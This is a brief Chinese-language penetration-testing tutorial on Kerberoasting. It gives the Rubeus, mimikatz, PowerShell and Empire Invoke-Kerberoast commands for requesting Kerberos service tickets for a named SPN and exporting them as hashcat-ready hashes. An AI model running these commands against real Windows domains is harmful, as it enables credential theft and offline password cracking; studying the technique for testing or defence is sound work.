How to get HASH
如何得到hash?
有如下方法
1.Rubeus.exe
这个工具github上就有,但是clone下来后需要自己编译成exe.
然后执行 Rubeus.exe kerberoast指令即可
2.mimikatz
mimikatz真的神器。
通过命令 kerberos::ask /target:你所指定的SPN,
即可通过认证的方式得到一个ST。
然后我们在kerberos::list里可以看到我们想要的ST
3.powershell
越来越发现powershell在域渗透中的重要性了
输入以下指令,即可完成HASH获取
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MySQL/win7.xie.com:3306/MySQL"
然后mimikatz导出即可
How to export hash获得了ST票据,但怎么导出?
1.mimikatz
导出所有票据
可以发现生成了kirbi文件。这就是我们所需要的hash了
2.Empire Powershell 框架
github:https://github.com/EmpireProject/Empire
我们通过这个框架可以导出hashcat格式的hash.
Import-Module .\Invoke-Kerberoast.ps1;Invoke-Kerberoast -outputFormat Hashcat
